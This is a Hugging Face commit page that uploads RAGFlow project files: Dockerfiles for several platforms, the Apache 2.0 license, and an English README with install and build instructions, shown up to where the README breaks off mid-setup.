jianglinzhang commited on
Commit
1192360
1 Parent(s): 8a44cb6

Upload 14 files

Browse files
Files changed (13) hide show
  1. Dockerfile.arm +43 -0
  2. Dockerfile.cuda +27 -0
  3. Dockerfile.scratch +56 -0
  4. Dockerfile.scratch.oc9 +58 -0
  5. LICENSE +201 -0
  6. README.md +342 -11
  7. README_ja.md +289 -0
  8. README_ko.md +325 -0
  9. README_zh.md +329 -0
  10. SECURITY.md +74 -0
  11. printEnvironment.sh +67 -0
  12. requirements.txt +104 -0
  13. requirements_arm.txt +175 -0
Dockerfile.arm ADDED
@@ -0,0 +1,43 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM python:3.11
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ COPY requirements_arm.txt /ragflow/requirements.txt
7
+
8
+
9
+ RUN pip install nltk --default-timeout=10000
10
+
11
+ RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
12
+ python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
13
+
14
+ RUN apt-get update && \
15
+ apt-get install -y curl gnupg && \
16
+ rm -rf /var/lib/apt/lists/*
17
+
18
+ RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
19
+ apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
20
+
21
+ RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
22
+ ENV PATH="/root/.cargo/bin:${PATH}"
23
+
24
+ RUN pip install graspologic
25
+
26
+ ADD ./web ./web
27
+ RUN cd ./web && npm i --force && npm run build
28
+
29
+ ADD ./api ./api
30
+ ADD ./conf ./conf
31
+ ADD ./deepdoc ./deepdoc
32
+ ADD ./rag ./rag
33
+ ADD ./agent ./agent
34
+ ADD ./graphrag ./graphrag
35
+
36
+ ENV PYTHONPATH=/ragflow/
37
+ ENV HF_ENDPOINT=https://hf-mirror.com
38
+
39
+ ADD docker/entrypoint.sh ./entrypoint.sh
40
+ ADD docker/.env ./
41
+ RUN chmod +x ./entrypoint.sh
42
+
43
+ ENTRYPOINT ["./entrypoint.sh"]
Dockerfile.cuda ADDED
@@ -0,0 +1,27 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM infiniflow/ragflow-base:v2.0
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ ## for cuda > 12.0
7
+ RUN pip uninstall -y onnxruntime-gpu
8
+ RUN pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
9
+
10
+
11
+ ADD ./web ./web
12
+ RUN cd ./web && npm i --force && npm run build
13
+
14
+ ADD ./api ./api
15
+ ADD ./conf ./conf
16
+ ADD ./deepdoc ./deepdoc
17
+ ADD ./rag ./rag
18
+ ADD ./agent ./agent
19
+ ADD ./graphrag ./graphrag
20
+
21
+ ENV PYTHONPATH=/ragflow/
22
+ ENV HF_ENDPOINT=https://hf-mirror.com
23
+
24
+ ADD docker/entrypoint.sh ./entrypoint.sh
25
+ RUN chmod +x ./entrypoint.sh
26
+
27
+ ENTRYPOINT ["./entrypoint.sh"]
Dockerfile.scratch ADDED
@@ -0,0 +1,56 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM ubuntu:22.04
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
7
+
8
+ RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
9
+ bash ~/miniconda.sh -b -p /root/miniconda3 && \
10
+ rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
11
+ echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
12
+ echo "conda activate base" >> ~/.bashrc
13
+
14
+ ENV PATH /root/miniconda3/bin:$PATH
15
+
16
+ RUN conda create -y --name py11 python=3.11
17
+
18
+ ENV CONDA_DEFAULT_ENV py11
19
+ ENV CONDA_PREFIX /root/miniconda3/envs/py11
20
+ ENV PATH $CONDA_PREFIX/bin:$PATH
21
+
22
+ RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
23
+ RUN apt-get install -y nodejs
24
+
25
+ RUN apt-get install -y nginx
26
+
27
+ ADD ./web ./web
28
+ ADD ./api ./api
29
+ ADD ./conf ./conf
30
+ ADD ./deepdoc ./deepdoc
31
+ ADD ./rag ./rag
32
+ ADD ./requirements.txt ./requirements.txt
33
+ ADD ./agent ./agent
34
+ ADD ./graphrag ./graphrag
35
+
36
+ RUN apt install openmpi-bin openmpi-common libopenmpi-dev
37
+ ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
38
+ RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
39
+ RUN cd ./web && npm i --force && npm run build
40
+ RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
41
+
42
+ RUN apt-get update && \
43
+ apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
44
+ rm -rf /var/lib/apt/lists/*
45
+
46
+ RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
47
+ RUN conda run -n py11 python -m nltk.downloader punkt
48
+ RUN conda run -n py11 python -m nltk.downloader wordnet
49
+
50
+ ENV PYTHONPATH=/ragflow/
51
+ ENV HF_ENDPOINT=https://hf-mirror.com
52
+
53
+ ADD docker/entrypoint.sh ./entrypoint.sh
54
+ RUN chmod +x ./entrypoint.sh
55
+
56
+ ENTRYPOINT ["./entrypoint.sh"]
Dockerfile.scratch.oc9 ADDED
@@ -0,0 +1,58 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM opencloudos/opencloudos:9.0
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
7
+
8
+ RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
9
+ bash ~/miniconda.sh -b -p /root/miniconda3 && \
10
+ rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
11
+ echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
12
+ echo "conda activate base" >> ~/.bashrc
13
+
14
+ ENV PATH /root/miniconda3/bin:$PATH
15
+
16
+ RUN conda create -y --name py11 python=3.11
17
+
18
+ ENV CONDA_DEFAULT_ENV py11
19
+ ENV CONDA_PREFIX /root/miniconda3/envs/py11
20
+ ENV PATH $CONDA_PREFIX/bin:$PATH
21
+
22
+ # RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
23
+ RUN dnf install -y nodejs
24
+
25
+ RUN dnf install -y nginx
26
+
27
+ ADD ./web ./web
28
+ ADD ./api ./api
29
+ ADD ./conf ./conf
30
+ ADD ./deepdoc ./deepdoc
31
+ ADD ./rag ./rag
32
+ ADD ./requirements.txt ./requirements.txt
33
+ ADD ./agent ./agent
34
+ ADD ./graphrag ./graphrag
35
+
36
+ RUN dnf install -y openmpi openmpi-devel python3-openmpi
37
+ ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
38
+ ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
39
+ RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
40
+ RUN cd ./web && npm i --force && npm run build
41
+ RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
42
+ RUN conda run -n py11 pip install redis
43
+
44
+ RUN dnf update -y && \
45
+ dnf install -y glib2 mesa-libGL && \
46
+ dnf clean all
47
+
48
+ RUN conda run -n py11 pip install ollama
49
+ RUN conda run -n py11 python -m nltk.downloader punkt
50
+ RUN conda run -n py11 python -m nltk.downloader wordnet
51
+
52
+ ENV PYTHONPATH=/ragflow/
53
+ ENV HF_ENDPOINT=https://hf-mirror.com
54
+
55
+ ADD docker/entrypoint.sh ./entrypoint.sh
56
+ RUN chmod +x ./entrypoint.sh
57
+
58
+ ENTRYPOINT ["./entrypoint.sh"]
LICENSE ADDED
@@ -0,0 +1,201 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Apache License
2
+ Version 2.0, January 2004
3
+ http://www.apache.org/licenses/
4
+
5
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6
+
7
+ 1. Definitions.
8
+
9
+ "License" shall mean the terms and conditions for use, reproduction,
10
+ and distribution as defined by Sections 1 through 9 of this document.
11
+
12
+ "Licensor" shall mean the copyright owner or entity authorized by
13
+ the copyright owner that is granting the License.
14
+
15
+ "Legal Entity" shall mean the union of the acting entity and all
16
+ other entities that control, are controlled by, or are under common
17
+ control with that entity. For the purposes of this definition,
18
+ "control" means (i) the power, direct or indirect, to cause the
19
+ direction or management of such entity, whether by contract or
20
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
21
+ outstanding shares, or (iii) beneficial ownership of such entity.
22
+
23
+ "You" (or "Your") shall mean an individual or Legal Entity
24
+ exercising permissions granted by this License.
25
+
26
+ "Source" form shall mean the preferred form for making modifications,
27
+ including but not limited to software source code, documentation
28
+ source, and configuration files.
29
+
30
+ "Object" form shall mean any form resulting from mechanical
31
+ transformation or translation of a Source form, including but
32
+ not limited to compiled object code, generated documentation,
33
+ and conversions to other media types.
34
+
35
+ "Work" shall mean the work of authorship, whether in Source or
36
+ Object form, made available under the License, as indicated by a
37
+ copyright notice that is included in or attached to the work
38
+ (an example is provided in the Appendix below).
39
+
40
+ "Derivative Works" shall mean any work, whether in Source or Object
41
+ form, that is based on (or derived from) the Work and for which the
42
+ editorial revisions, annotations, elaborations, or other modifications
43
+ represent, as a whole, an original work of authorship. For the purposes
44
+ of this License, Derivative Works shall not include works that remain
45
+ separable from, or merely link (or bind by name) to the interfaces of,
46
+ the Work and Derivative Works thereof.
47
+
48
+ "Contribution" shall mean any work of authorship, including
49
+ the original version of the Work and any modifications or additions
50
+ to that Work or Derivative Works thereof, that is intentionally
51
+ submitted to Licensor for inclusion in the Work by the copyright owner
52
+ or by an individual or Legal Entity authorized to submit on behalf of
53
+ the copyright owner. For the purposes of this definition, "submitted"
54
+ means any form of electronic, verbal, or written communication sent
55
+ to the Licensor or its representatives, including but not limited to
56
+ communication on electronic mailing lists, source code control systems,
57
+ and issue tracking systems that are managed by, or on behalf of, the
58
+ Licensor for the purpose of discussing and improving the Work, but
59
+ excluding communication that is conspicuously marked or otherwise
60
+ designated in writing by the copyright owner as "Not a Contribution."
61
+
62
+ "Contributor" shall mean Licensor and any individual or Legal Entity
63
+ on behalf of whom a Contribution has been received by Licensor and
64
+ subsequently incorporated within the Work.
65
+
66
+ 2. Grant of Copyright License. Subject to the terms and conditions of
67
+ this License, each Contributor hereby grants to You a perpetual,
68
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69
+ copyright license to reproduce, prepare Derivative Works of,
70
+ publicly display, publicly perform, sublicense, and distribute the
71
+ Work and such Derivative Works in Source or Object form.
72
+
73
+ 3. Grant of Patent License. Subject to the terms and conditions of
74
+ this License, each Contributor hereby grants to You a perpetual,
75
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76
+ (except as stated in this section) patent license to make, have made,
77
+ use, offer to sell, sell, import, and otherwise transfer the Work,
78
+ where such license applies only to those patent claims licensable
79
+ by such Contributor that are necessarily infringed by their
80
+ Contribution(s) alone or by combination of their Contribution(s)
81
+ with the Work to which such Contribution(s) was submitted. If You
82
+ institute patent litigation against any entity (including a
83
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
84
+ or a Contribution incorporated within the Work constitutes direct
85
+ or contributory patent infringement, then any patent licenses
86
+ granted to You under this License for that Work shall terminate
87
+ as of the date such litigation is filed.
88
+
89
+ 4. Redistribution. You may reproduce and distribute copies of the
90
+ Work or Derivative Works thereof in any medium, with or without
91
+ modifications, and in Source or Object form, provided that You
92
+ meet the following conditions:
93
+
94
+ (a) You must give any other recipients of the Work or
95
+ Derivative Works a copy of this License; and
96
+
97
+ (b) You must cause any modified files to carry prominent notices
98
+ stating that You changed the files; and
99
+
100
+ (c) You must retain, in the Source form of any Derivative Works
101
+ that You distribute, all copyright, patent, trademark, and
102
+ attribution notices from the Source form of the Work,
103
+ excluding those notices that do not pertain to any part of
104
+ the Derivative Works; and
105
+
106
+ (d) If the Work includes a "NOTICE" text file as part of its
107
+ distribution, then any Derivative Works that You distribute must
108
+ include a readable copy of the attribution notices contained
109
+ within such NOTICE file, excluding those notices that do not
110
+ pertain to any part of the Derivative Works, in at least one
111
+ of the following places: within a NOTICE text file distributed
112
+ as part of the Derivative Works; within the Source form or
113
+ documentation, if provided along with the Derivative Works; or,
114
+ within a display generated by the Derivative Works, if and
115
+ wherever such third-party notices normally appear. The contents
116
+ of the NOTICE file are for informational purposes only and
117
+ do not modify the License. You may add Your own attribution
118
+ notices within Derivative Works that You distribute, alongside
119
+ or as an addendum to the NOTICE text from the Work, provided
120
+ that such additional attribution notices cannot be construed
121
+ as modifying the License.
122
+
123
+ You may add Your own copyright statement to Your modifications and
124
+ may provide additional or different license terms and conditions
125
+ for use, reproduction, or distribution of Your modifications, or
126
+ for any such Derivative Works as a whole, provided Your use,
127
+ reproduction, and distribution of the Work otherwise complies with
128
+ the conditions stated in this License.
129
+
130
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
131
+ any Contribution intentionally submitted for inclusion in the Work
132
+ by You to the Licensor shall be under the terms and conditions of
133
+ this License, without any additional terms or conditions.
134
+ Notwithstanding the above, nothing herein shall supersede or modify
135
+ the terms of any separate license agreement you may have executed
136
+ with Licensor regarding such Contributions.
137
+
138
+ 6. Trademarks. This License does not grant permission to use the trade
139
+ names, trademarks, service marks, or product names of the Licensor,
140
+ except as required for reasonable and customary use in describing the
141
+ origin of the Work and reproducing the content of the NOTICE file.
142
+
143
+ 7. Disclaimer of Warranty. Unless required by applicable law or
144
+ agreed to in writing, Licensor provides the Work (and each
145
+ Contributor provides its Contributions) on an "AS IS" BASIS,
146
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147
+ implied, including, without limitation, any warranties or conditions
148
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149
+ PARTICULAR PURPOSE. You are solely responsible for determining the
150
+ appropriateness of using or redistributing the Work and assume any
151
+ risks associated with Your exercise of permissions under this License.
152
+
153
+ 8. Limitation of Liability. In no event and under no legal theory,
154
+ whether in tort (including negligence), contract, or otherwise,
155
+ unless required by applicable law (such as deliberate and grossly
156
+ negligent acts) or agreed to in writing, shall any Contributor be
157
+ liable to You for damages, including any direct, indirect, special,
158
+ incidental, or consequential damages of any character arising as a
159
+ result of this License or out of the use or inability to use the
160
+ Work (including but not limited to damages for loss of goodwill,
161
+ work stoppage, computer failure or malfunction, or any and all
162
+ other commercial damages or losses), even if such Contributor
163
+ has been advised of the possibility of such damages.
164
+
165
+ 9. Accepting Warranty or Additional Liability. While redistributing
166
+ the Work or Derivative Works thereof, You may choose to offer,
167
+ and charge a fee for, acceptance of support, warranty, indemnity,
168
+ or other liability obligations and/or rights consistent with this
169
+ License. However, in accepting such obligations, You may act only
170
+ on Your own behalf and on Your sole responsibility, not on behalf
171
+ of any other Contributor, and only if You agree to indemnify,
172
+ defend, and hold each Contributor harmless for any liability
173
+ incurred by, or claims asserted against, such Contributor by reason
174
+ of your accepting any such warranty or additional liability.
175
+
176
+ END OF TERMS AND CONDITIONS
177
+
178
+ APPENDIX: How to apply the Apache License to your work.
179
+
180
+ To apply the Apache License to your work, attach the following
181
+ boilerplate notice, with the fields enclosed by brackets "[]"
182
+ replaced with your own identifying information. (Don't include
183
+ the brackets!) The text should be enclosed in the appropriate
184
+ comment syntax for the file format. We also recommend that a
185
+ file or class name and description of purpose be included on the
186
+ same "printed page" as the copyright notice for easier
187
+ identification within third-party archives.
188
+
189
+ Copyright [yyyy] [name of copyright owner]
190
+
191
+ Licensed under the Apache License, Version 2.0 (the "License");
192
+ you may not use this file except in compliance with the License.
193
+ You may obtain a copy of the License at
194
+
195
+ http://www.apache.org/licenses/LICENSE-2.0
196
+
197
+ Unless required by applicable law or agreed to in writing, software
198
+ distributed under the License is distributed on an "AS IS" BASIS,
199
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200
+ See the License for the specific language governing permissions and
201
+ limitations under the License.
README.md CHANGED
@@ -1,11 +1,342 @@
1
- ---
2
- title: Ragflow
3
- emoji: 🏃
4
- colorFrom: green
5
- colorTo: purple
6
- sdk: docker
7
- pinned: false
8
- license: apache-2.0
9
- ---
10
-
11
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a>
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
22
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
23
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
24
+ </a>
25
+ </p>
26
+
27
+ <h4 align="center">
28
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
29
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
30
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
31
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
32
+ <a href="https://demo.ragflow.io">Demo</a>
33
+ </h4>
34
+
35
+ <details open>
36
+ <summary></b>📕 Table of Contents</b></summary>
37
+
38
+ - 💡 [What is RAGFlow?](#-what-is-ragflow)
39
+ - 🎮 [Demo](#-demo)
40
+ - 📌 [Latest Updates](#-latest-updates)
41
+ - 🌟 [Key Features](#-key-features)
42
+ - 🔎 [System Architecture](#-system-architecture)
43
+ - 🎬 [Get Started](#-get-started)
44
+ - 🔧 [Configurations](#-configurations)
45
+ - 🛠️ [Build from source](#-build-from-source)
46
+ - 🛠️ [Launch service from source](#-launch-service-from-source)
47
+ - 📚 [Documentation](#-documentation)
48
+ - 📜 [Roadmap](#-roadmap)
49
+ - 🏄 [Community](#-community)
50
+ - 🙌 [Contributing](#-contributing)
51
+
52
+ </details>
53
+
54
+ ## 💡 What is RAGFlow?
55
+
56
+ [RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
57
+
58
+ ## 🎮 Demo
59
+
60
+ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
61
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
62
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
63
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
64
+ </div>
65
+
66
+
67
+ ## 🔥 Latest Updates
68
+
69
+ - 2024-09-13 Adds search mode for knowledge base Q&A.
70
+ - 2024-09-09 Adds a medical consultant agent template.
71
+ - 2024-08-22 Support text to SQL statements through RAG.
72
+ - 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) and mind map.
73
+ - 2024-07-23 Supports audio file parsing.
74
+ - 2024-07-08 Supports workflow based on [Graph](./agent/README.md).
75
+ - 2024-06-27 Supports Markdown and Docx in the Q&A parsing method, extracting images from Docx files, extracting tables from Markdown files.
76
+ - 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
77
+
78
+
79
+ ## 🌟 Key Features
80
+
81
+ ### 🍭 **"Quality in, quality out"**
82
+
83
+ - [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
84
+ - Finds "needle in a data haystack" of literally unlimited tokens.
85
+
86
+ ### 🍱 **Template-based chunking**
87
+
88
+ - Intelligent and explainable.
89
+ - Plenty of template options to choose from.
90
+
91
+ ### 🌱 **Grounded citations with reduced hallucinations**
92
+
93
+ - Visualization of text chunking to allow human intervention.
94
+ - Quick view of the key references and traceable citations to support grounded answers.
95
+
96
+ ### 🍔 **Compatibility with heterogeneous data sources**
97
+
98
+ - Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
99
+
100
+ ### 🛀 **Automated and effortless RAG workflow**
101
+
102
+ - Streamlined RAG orchestration catered to both personal and large businesses.
103
+ - Configurable LLMs as well as embedding models.
104
+ - Multiple recall paired with fused re-ranking.
105
+ - Intuitive APIs for seamless integration with business.
106
+
107
+ ## 🔎 System Architecture
108
+
109
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
110
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
111
+ </div>
112
+
113
+ ## 🎬 Get Started
114
+
115
+ ### 📝 Prerequisites
116
+
117
+ - CPU >= 4 cores
118
+ - RAM >= 16 GB
119
+ - Disk >= 50 GB
120
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
121
+ > If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
122
+
123
+ ### 🚀 Start up the server
124
+
125
+ 1. Ensure `vm.max_map_count` >= 262144:
126
+
127
+ > To check the value of `vm.max_map_count`:
128
+ >
129
+ > ```bash
130
+ > $ sysctl vm.max_map_count
131
+ > ```
132
+ >
133
+ > Reset `vm.max_map_count` to a value at least 262144 if it is not.
134
+ >
135
+ > ```bash
136
+ > # In this case, we set it to 262144:
137
+ > $ sudo sysctl -w vm.max_map_count=262144
138
+ > ```
139
+ >
140
+ > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
141
+ >
142
+ > ```bash
143
+ > vm.max_map_count=262144
144
+ > ```
145
+
146
+ 2. Clone the repo:
147
+
148
+ ```bash
149
+ $ git clone https://github.com/infiniflow/ragflow.git
150
+ ```
151
+
152
+ 3. Build the pre-built Docker images and start up the server:
153
+
154
+ > Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.11.0`, before running the following commands.
155
+
156
+ ```bash
157
+ $ cd ragflow/docker
158
+ $ chmod +x ./entrypoint.sh
159
+ $ docker compose up -d
160
+ ```
161
+
162
+
163
+ > The core image is about 9 GB in size and may take a while to load.
164
+
165
+ 4. Check the server status after having the server up and running:
166
+
167
+ ```bash
168
+ $ docker logs -f ragflow-server
169
+ ```
170
+
171
+ _The following output confirms a successful launch of the system:_
172
+
173
+ ```bash
174
+ ____ ______ __
175
+ / __ \ ____ _ ____ _ / ____// /____ _ __
176
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
177
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
178
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
179
+ /____/
180
+
181
+ * Running on all addresses (0.0.0.0)
182
+ * Running on http://127.0.0.1:9380
183
+ * Running on http://x.x.x.x:9380
184
+ INFO:werkzeug:Press CTRL+C to quit
185
+ ```
186
+ > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network abnormal` error because, at that moment, your RAGFlow may not be fully initialized.
187
+
188
+ 5. In your web browser, enter the IP address of your server and log in to RAGFlow.
189
+ > With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
190
+ 6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
191
+
192
+ > See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
193
+
194
+ _The show is now on!_
195
+
196
+ ## 🔧 Configurations
197
+
198
+ When it comes to system configurations, you will need to manage the following files:
199
+
200
+ - [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
201
+ - [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
202
+ - [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
203
+
204
+ You must ensure that changes to the [.env](./docker/.env) file are in line with what are in the [service_conf.yaml](./docker/service_conf.yaml) file.
205
+
206
+ > The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
207
+
208
+ To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
209
+
210
+ > Updates to all system configurations require a system reboot to take effect:
211
+ >
212
+ > ```bash
213
+ > $ docker-compose up -d
214
+ > ```
215
+
216
+ ## 🛠️ Build from source
217
+
218
+ To build the Docker images from source:
219
+
220
+ ```bash
221
+ $ git clone https://github.com/infiniflow/ragflow.git
222
+ $ cd ragflow/
223
+ $ docker build -t infiniflow/ragflow:dev .
224
+ $ cd ragflow/docker
225
+ $ chmod +x ./entrypoint.sh
226
+ $ docker compose up -d
227
+ ```
228
+
229
+ ## 🛠️ Launch service from source
230
+
231
+ To launch the service from source:
232
+
233
+ 1. Clone the repository:
234
+
235
+ ```bash
236
+ $ git clone https://github.com/infiniflow/ragflow.git
237
+ $ cd ragflow/
238
+ ```
239
+
240
+ 2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
241
+
242
+ ```bash
243
+ $ conda create -n ragflow python=3.11.0
244
+ $ conda activate ragflow
245
+ $ pip install -r requirements.txt
246
+ ```
247
+
248
+ ```bash
249
+ # If your CUDA version is higher than 12.0, run the following additional commands:
250
+ $ pip uninstall -y onnxruntime-gpu
